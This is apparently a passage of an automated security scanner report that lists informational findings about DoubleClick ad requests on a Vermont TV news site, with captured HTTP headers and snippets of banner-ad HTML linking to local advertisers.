GET /adi/wn.loc.wcax/news;sz=300x250;wnsz=52;tile=5;wncc=News;wnpt=C;wnpc=category;wncp=WCAX;wncid=18197;=undefined;=undefined;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad88_188169=wcax;wnad88_50966=wcax;wnad88_50910=wcax;wnad49=wcax;apptype=platform;env=production;ord=19818295? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2863

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6959 Template Name = +WorldNow Flash Banner
...[SNIP]...
<!-- Copyright 2002 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<A TARGET="_top" HREF="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/f%3B238976430%3B0-0%3B0%3B29112185%3B4307-300/250%3B41319785/41337572/1%3B%3B%7Esscs%3D%3f[%Click-through URL%]"><IMG SRC="http://s0.2mdn.net/3143129/030711_Consumer_Discover_300x250.gif?adID=238976430" alt="" BORDER=0></A>
...[SNIP]...
10.39. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/wn.loc.wcax/news;sz=728x90;wnsz=41;tile=3;wncc=News;wnpt=S;wnpc=story;wncp=WCAX;wncid=14408230;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad20=wcax;wnad49=wcax;apptype=platform;env=production;ord=26798968? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=14408230
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:59:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 634

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script>
var gfEbForceStreaming = 1;

</script>
<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2326412&PluID=0&w=728&h=90&ord=[timestamp]&ucm=true"></script>
<noscript>
<a href="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=brd&FlightID=2326412&Page=&PluID=0&Pos=320" target="_blank"><img src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=bsr&FlightID=2326412&Page=&PluID=0&Pos=320" border=0 width=728 height=90></a>
...[SNIP]...
10.40. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/news;sz=300x250;wnsz=43;tile=4;wncc=News;wnpt=C;wnpc=category;wncp=WCAX;wncid=18197;=undefined;=undefined;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad88_188169=wcax;wnad88_50966=wcax;wnad88_50910=wcax;wnad49=wcax;apptype=platform;env=production;ord=19818295? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 575

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
ref="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/z%3B213798475%3B0-0%3B0%3B29112185%3B4307-300/250%3B30975919/30993795/1%3B%3B%7Esscs%3D%3fhttp://www.vermontorthoclinic.org/" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/134907_AM.gif?adID=213798475" WIDTH="300" HEIGHT="250" alt="RRMC" title="RRMC"></a>
...[SNIP]...
10.41. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/news;sz=728x90;wnsz=46;tile=3;wncc=News;wnpt=C;wnpc=category;wncp=WCAX;wncid=18197;=undefined;=undefined;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad88_188169=wcax;wnad88_50966=wcax;wnad88_50910=wcax;wnad49=wcax;apptype=platform;env=production;ord=19818295? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 640

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
8054149%3B0-0%3B0%3B29112185%3B3454-728/90%3B41100360/41118147/1%3B%3B%7Esscs%3D%3fhttp://www.vermontcorporatecollege.com?utm_campaign=vcc-spring2011&utm_source=wcax&utm_medium=banner" target="_blank"><img border="0" src="http://s0.2mdn.net/3127317/VTCC4620-Banner-Ad-728X90.gif?adID=238054149" WIDTH="728" HEIGHT="90" alt="" title=""></a>
...[SNIP]...
10.42. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/news;sz=180x150;wnsz=20;tile=8;wncc=News;wnpt=S;wnpc=story;wncp=WCAX;wncid=14408244;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad20=wcax;wnad49=wcax;apptype=platform;env=production;ord=11313361? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=14408244
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 603

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/g%3B211848897%3B0-0%3B0%3B29112185%3B2928-180/150%3B30237913/30255790/1%3B%3B%7Esscs%3D%3fhttp://www.greenmtntoursvt.com" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/129575_AM.gif?adID=211848897" WIDTH="180" HEIGHT="150" alt="Green Mountain Tours" title="Green Mountain Tours"></a>
...[SNIP]...
10.43. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/news;sz=490x25;wnsz=22;tile=6;wncc=News;wnpt=C;wnpc=category;wncp=WCAX;wncid=18197;=undefined;=undefined;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad88_188169=wcax;wnad88_50966=wcax;wnad88_50910=wcax;wnad49=wcax;apptype=platform;env=production;ord=19818295? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 601

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/q%3B211870089%3B0-0%3B0%3B29112185%3B9289-490/25%3B30238038/30255915/1%3B%3B%7Esscs%3D%3fhttp://www.greenmtntoursvt.com" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/129574_AM.jpg?adID=211870089" WIDTH="490" HEIGHT="25" alt="Green Mountain Tours" title="Green Mountain Tours"></a>
...[SNIP]...
10.44. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/news;sz=180x150;wnsz=35;tile=8;wncc=News;wnpt=C;wnpc=category;wncp=WCAX;wncid=18197;=undefined;=undefined;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad88_188169=wcax;wnad88_50966=wcax;wnad88_50910=wcax;wnad49=wcax;apptype=platform;env=production;ord=19818295? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 560

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/i%3B239321176%3B0-0%3B0%3B29112185%3B2928-180/150%3B41453841/41471628/1%3B%3B%7Esscs%3D%3fhttp://vthomeandgardenshow.com/" target="_blank"><img border="0" src="http://s0.2mdn.net/3150129/homeshow2011.jpg?adID=239321176" WIDTH="189" HEIGHT="150" alt="" title=""></a>
...[SNIP]...
10.45. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/news;sz=300x250;wnsz=43;tile=4;wncc=News;wnpt=C;wnpc=category;wncp=WCAX;wncid=18963;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad88_18197=wcax;wnad49=wcax;apptype=platform;env=production;ord=50570302? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18963
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:35:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 597

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
lick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/s%3B213798723%3B1-0%3B0%3B29112185%3B4307-300/250%3B30976053/30993929/1%3B%3B%7Esscs%3D%3fhttp://rrmc.privatehealthnews.com/html/babyexpecting.asp" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/134911_AM.gif?adID=213798723" WIDTH="300" HEIGHT="250" alt="RRMC" title="RRMC"></a>
...[SNIP]...
10.46. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/news;sz=468x60;wnsz=1;tile=7;wncc=News;wnpt=S;wnpc=story;wncp=WCAX;wncid=465801;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad49=wcax;apptype=platform;env=production;ord=40324480? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=465801
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:40:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 619

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
3/0/%2a/w%3B234572806%3B0-0%3B0%3B29112185%3B1-468/60%3B40072359/40090146/1%3B%3B%7Esscs%3D%3fhttp://www.champlain.edu/Graduate-Studies/Programs/Master-of-Business-Administration.html" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/186075_AM.jpg?adID=234572806" WIDTH="468" HEIGHT="60" alt="" title=""></a>
...[SNIP]...
10.47. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/news;sz=94x19;wnsz=88;tile=8;wncc=News;wnpt=C;wnpc=home;wncp=WCAX;wncid=18195;wnad85=wcax;wnad44=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad88_188169=wcax;wnad88_13530=ap;wnad35=wcax;wnad88_18197=wcax;wnad49=wcax;apptype=platform;env=production;ord=89441616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:29:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 376

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/d;44306;0-0;0;29112185;26594-94/19;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.48. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/news;sz=300x250;wnsz=52;tile=5;wncc=News;wnpt=C;wnpc=category;wncp=WCAX;wncid=18963;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad88_18197=wcax;wnad49=wcax;apptype=platform;env=production;ord=50570302? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18963
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:35:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 658

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
2185%3B4307-300/250%3B40072567/40090354/1%3B%3B%7Esscs%3D%3fhttp://www.champlain.edu/Graduate-Studies/Programs/Master-of-Science-in-Managing-Innovation-and-Information-Technology.html" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/186089_AM.jpg?adID=234573217" WIDTH="300" HEIGHT="250" alt="" title=""></a>
...[SNIP]...
10.49. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/news;sz=300x250;wnsz=52;tile=5;wncc=News;wnpt=S;wnpc=story;wncp=WCAX;wncid=14408244;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad20=wcax;wnad49=wcax;apptype=platform;env=production;ord=11313361? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=14408244
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 575

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
ref="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/l%3B213798723%3B0-0%3B0%3B29112185%3B4307-300/250%3B30976129/30994005/1%3B%3B%7Esscs%3D%3fhttp://rrmc.privatehealthnews.com/" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/134909_AM.gif?adID=213798723" WIDTH="300" HEIGHT="250" alt="RRMC" title="RRMC"></a>
...[SNIP]...
10.50. http://ad.doubleclick.net/adi/wn.loc.wcax/news-ap-national  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news-ap-national

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/news-ap-national;sz=94x19;wnsz=88;tile=1;wncc=News%20-%20AP-National;wnpt=C;wnpc=home;wncp=WCAX;wncid=18195;wnad85=wcax;wnad44=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad88_188169=wcax;wnad88_13530=ap;wnad35=wcax;wnad88_18197=wcax;wnad49=wcax;apptype=platform;env=production;ord=[page.rand]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:29:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 376

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/c;44306;0-0;0;29116615;26594-94/19;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.51. http://ad.doubleclick.net/adi/wn.loc.wcax/news-ap-state  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news-ap-state

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/news-ap-state;sz=94x19;wnsz=88;tile=10;wncc=News%20-%20AP-State;wnpt=C;wnpc=category;wncp=WCAX;wncid=18197;=undefined;=undefined;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad88_188169=wcax;wnad88_50966=wcax;wnad88_50910=wcax;wnad49=wcax;apptype=platform;env=production;ord=19818295? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 376

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/w;44306;0-0;0;29116616;26594-94/19;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.52. http://ad.doubleclick.net/adi/wn.loc.wcax/political  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/political

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/wn.loc.wcax/political;sz=300x250;wnsz=52;tile=5;wncc=Political;wnpt=S;wnpc=story;wncp=WCAX;wncid=503137;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad49=wcax;apptype=platform;env=production;ord=99140980? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
